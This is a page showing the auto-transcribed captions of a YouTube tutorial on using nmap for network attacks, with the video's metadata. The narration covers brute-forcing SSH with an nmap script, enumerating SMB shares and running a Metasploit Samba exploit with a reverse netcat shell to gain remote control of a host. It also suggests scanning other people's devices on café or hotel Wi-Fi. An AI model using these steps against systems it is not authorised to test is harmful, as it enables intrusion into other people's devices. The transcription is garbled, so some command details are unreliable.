NMAP Tutorial for Beginners! Network Attacks

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
today you'll be learning how you can use mmap a network mapping tool that will allow you to scan devices with your own home Wi-Fi network all possibly let's say you go to a free Wi-Fi network like Starbucks Hotel Wi-Fi the apports Wi-Fi and so on and from there you'll be able to detect all these different devices within the network and look for possibly entry points to give you access into those devices I kid you not at the same time if you have Mr hacka as your neighbor then what happens is that he may somehow doten your Wi-Fi password and he is within your network you'll be able to identify just that pretty cool huh let's go ahead and get started so right in front of us we have col Linux running and over here what you can see is that we can go ahead and open up terminal and I can zoom a little more so it's easier for you to see and all you got to do is enter n map and from M map you can see all the different options that we can highlight here in order to run a scan against the network or against the target devices or websites and you'll be saying what if I'm on a Windows computer in that case case what you can do here is you can go into Microsoft Store go and ENT the K Linux in the search View and click under install so once you have installed K Linux on your Windows computer you will be able to then use map to likewise scan all these different devices within the network or on the Internet over through the internet using Color Linux using app app that is also likewise installed and available within your Windows computer so right in the middle you would have your own home router all right or possibly you're connecting through Starbucks free Wi-Fi and so on and then of course on the right side you would have your own computer so your own computer could be a laptop it could also be your mobile device where you have n map installed and once you have that as long as you connected to the network you'll be able to scan the network looking up for other devices within the network that you can then be able to look out for say does this have remote desktop protocol open does it have say SSH open does it have say a web server that is open up so once you're able to discover all these different Services you'll be able to use subsequent tools or even scripts from map to launch attacks against all these different connected devices and yes I know the Wi-Fi route that I'm drawing here looks like a TV and not only that let's say from your own personal computer you'll be able to launch attacks against all these different sites across the internet say for example you go to L ley.com and then you launch a attack against the site looking up for possibly different type of ports to open say port 80 Port 443 Port 445 and so on so forth and see which one of them open that you can possibly Target with subsequent tools like say mploy like say boot forcing attack tools and map scripts and so on and don't bother attacking Mr heck loy's website because I will find out your IP address and remember kids before we go any further hacking is illegal and when you scan a website using mmap when you scan another device using mmap many of this intrusion detection systems or firewalls will be able to pick pick up hey there is this IP address they're running all the scans in our Network let's go and find out who is this person and if you get found out that's it it's game over for you and the most important thing of all is don't tell them that Mr healong taught you all this all right so use case number one let's discover all network devices with ins say the Wi-Fi router that you connected over into the first thing you can do is enter IP addr and from here you'll be able to uncover your IP address so over here you have 1 A2 1 68.0 1117 sl24 all right so with that we'll be able to go ahead and launch a scan against the network so you can see over here with mmap follow by- SN so this means no port scan so this help us speed up the scan against the entire network and Then followed by over here 1 1821 168/24 so we scanning all right all of the IP addresses with been2 1680 and then one all the way to 255 so once you're ready for the scan go ahead in 3 2 1 hit answer and right now we're scanning against all these different IP addresses and right here we can see which one of these devices are up and running so you can see over here we have the list and from the list you can see we have1 is host up one11 1 0 and so on so farth so this help us identify all those IP addresses that we can potentially Target later on and from the list over here what we can do is go ahead and Target a specific IP address so in this case let's say we target 1821 16801 184 so you can see over here we have the instructions of nmap against the IP address of CR in the real world you can also be targeting a specific domain name say ly.com so when you go ahead and hit enter on that we're using the default settings that comes along with the default scan and immediately from the default scan we'll be able to see all these different Services as well as its Associated ports that are being open and the protocol of TCP and so on so forth so this help us understand what are potential Services is open so it's like a house how many windows are open how many doors open that we can possibly have an entry point over into the device however that is typically not sufficient for us to launch an attack against the service so what we need here is typically - SV this stands for service version so what it does is that help us identify specifically what is the version of that service so that we'll be able to look up and see if there are any common vulnerable exposure or exploits that's available for us to Target against that service and once you're ready go ahead and three two one hit and thr and that and this will take a little longer because right now we're going deeper we're probing deeper we're enumerating deeper so it takes a longer time for us to get those results so hang on tight get a cup of coffee and come back in a second boom done we now got the service version so you can see right here we got a lot more details than the one earlier so over here in this case you can see op SSH 5.3 P1 Apache all right 2.2.14 Cory IMM and so so far all right the leas goes on so this are all the specific versions of the service that's running on that computer so say for example we can use search sploit to search up say open SSH 5.3 P1 which is the service version We uncovered earlier for Port 22 when I hit enter on this we can look up all of these potential exploits that we can use as part of launching the attack against that specific service at the same time we can also launch matlo so that from maty we can directly use a much more interactive option to gain direct access to the run of the exploit so in this case we're starting up the M exploit framework over here and what I can do is once more I can do a search on open SSH so I do a search open SSH all right and we can see over here we have several modules that are available for us to use so in this case we have say a exploit Windows local auxiliary scanner SSH enumerate users and so on so forth so all this are also the other options that we can use against a specific service version and we also have the option of using mmap scripts to help us run say boot Force attack against the login VI of Port 22 which is secure shell so in this case as you can see over here we have the following of-- script SSH brute all right followed by the script arguments all right so in this case we have the user database and user database is pointing over into this common username St txt followed by the pass DB all right in this case we also have the common password.txt and of course the script argument of SSH Brute Force timeout and of course finally with the target IP address and once you're ready in three 2 one hit anthor and d and you can see right here we're trying the username password pair to see which one gets us a hit all right I got some seriously bad news we are not able to gain access to the service of secure Shell through a boot Force attack so we have to use other methods now before we go over to using other exploits is something really cool here that generates a report for us so what you can see over here is we have nmap as the network mapping tool T5 for agressive and- a is to use some of the default scripts OS detection and all these different options is available for us- V for theose and a Target Network so in this case we are once again scanning across all the IP addresses and output into a network map XML file which will then later convert so that we get a view or a graphical view of what's going on across the network so once you're ready in 3 2 1 H an and that well this does take a wall we were scanning sever host we're scanning the parts we're scanning using all this default options so it takes a while so in the meantime go ahead and grip yourself all right 10 cups of coffee while we wait for the results all right so the scan has completed and we scan across all these IP addresses and you can see over here we have the results for each of the IP address including all of this different version information so what we can do now is we have to F so if you see over here on the previous command we have to follow of network map. XML so if I go ahead and open up say FX Network dm. XML hit enter on that it shows us the information over here but it's pretty hard to read it's not really human readable so what we need to do then is is there a way for us to convert it into a very beautiful format so that we can see exactly what's going on in a report format so right here we're using xslt Pro do/ Network map. XML followed by- output Network dm. HTML so we're converting this to a HTML file so all I going to do right now is again using Firefox I'm targeting into Network dm. HTML hit enter on that and boom you can see right here we have really beautiful result format so you can see all the IP addresses and of course if I zoom in a little more so it's easier for you to see as I screw down further all right we can see okay for this specific IP address what are the open ports okay and we can see the results over here right and I scroll down further okay we can see possibly other live hosts of course we can always easily click to expand on them all right so these are the things that we can do right here all right so we got another one or IP address 18268 z101 I can scroll down further and you can see some other interesting information over here as well so we got the IP address of 1821 1680 1110 right Port 80008 89 all right 8443 and so and so forth so all this are the different IP addresses that we have within the network and you can easily do a scan like this in a cafe in the appon lounge at the hotel and you'll be able to uncover all these different IP addresses that you can easily Target later on say for exploit and if you recall earlier we were having our own computer over here and we were running all these different scans against and other possible devices across the networks and so on and so forth and what happened then was that we had a list of all the services and the service versions that are running however we had to do a manual check so we had to go over into search exploit we had to go over into met exploit and then from there we had to list all this different types of service versions and see whether there are exploits available for it but what if within nmap alone itself we are able to get those results directly that would save us a lot of time and a lot of trouble having to use multiple different tools why not just use one script scan against the target device and be able to list out all those common vulnerable exposure possible exploits for it and that would save us lot time effort and I'll be teaching you just that so all we got to do right now is ensure that we indicate D- script vaugh all right so in this case we're targeting a singer Port so this is the singer Port we're targeting and seeing whether there are any possible vulnerabilities that we can go after so you can see right here we have completed the scan and we have found certain vulnerabilities so we have a following of Apache by range F through dos denial service attack all right so this is the CV number 2011 3192 all right it's vulnerable to a denial service attack when numerous overlapping bite ranges are requested all right we can also see that there is a HTTP Trace is enabled all right interal IP licked all right we have the HTTP cookie flax cross domain policy or right cross domain and client access policies vulnerable and we also have the cross-site request forgery or spider spidering limited to Mex dep and so on so forth so we have all this different information as well right so we are uncovering all these vulnerabilities within the port ad service all right so in this case we also could look at enumeration so we see there is a/ WordPress SL test/ monono PHP my admin so all these are the additional Pages we have found within the site that we can go after all right so you can see over here potentially interesting folder with directory listing so it shows us the list of directories is available all right so we can see all this information directly from here and right here we can also use map to Target specific services so in this case we're targeting Port 139 445 using a script of SMB OS Discovery enumeration of the shares and enumeration of users against another IP address so again we can use this for a set of IP addresses or a specific device so once you're ready hit enter in three 2 1 hit enter in that and we can see right here we're able to figure out what are all the different directories that we have access into all right so this is a way for us to very quickly be able to uncover all the different accessible directories of a Remote device and this time around you can see right here we're targeting two ports so in this case put 139 445 a specific IP address and getting the service version of it so so we are trying to look up specifically for certain vulnerabilities in a Target device and we got a result and with a result right here we can go ahead and say look over for this potential exploit and say m spoit that can allow us to go ahead and possibly gain direct access over into the computer so you can see right here I am on M sploit and all I got to do is say enter search Follow by SMB all right so we can see lots of results I can just search for a sbar and over here we can use a specific exploit again you do have to test out several of these exploits and see which one of them would work so you have to read a little more understand a little more and see what's going on so in this case we will use exploit multi sunbar user map script so let's go ahead and enter use 8 enter on that all right so we have here the default payload which is CMD Unix reverse netcat enter show options so right now all we got to do is quite simply enter set our host 1 i26 68.0 212 so this is the target IP address hit enter on that and right here you can see under the payload options we have already set the payload which is lhost which is your call Linux or the attack us machine in this case we2 1680 to17 L Port the listening Port of course in this case we have 4444 all right so once you're ready all you got to do right now is go ahead and enter exploit hit enter and that and we'll see if we get a results starting or stter reverse TCB Handler command shell Session One open so we are in I can enter PR working directory I can I can enter who am I we are in it's game over enter LS we can see all this different information right here which means that we have now remotely control the device
Info
Channel: Loi Liang Yang
Views: 74,103
Rating: undefined out of 5
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: LTMucsu35dk
Channel Id: undefined
Length: 15min 50sec (950 seconds)
Published: Thu Nov 23 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.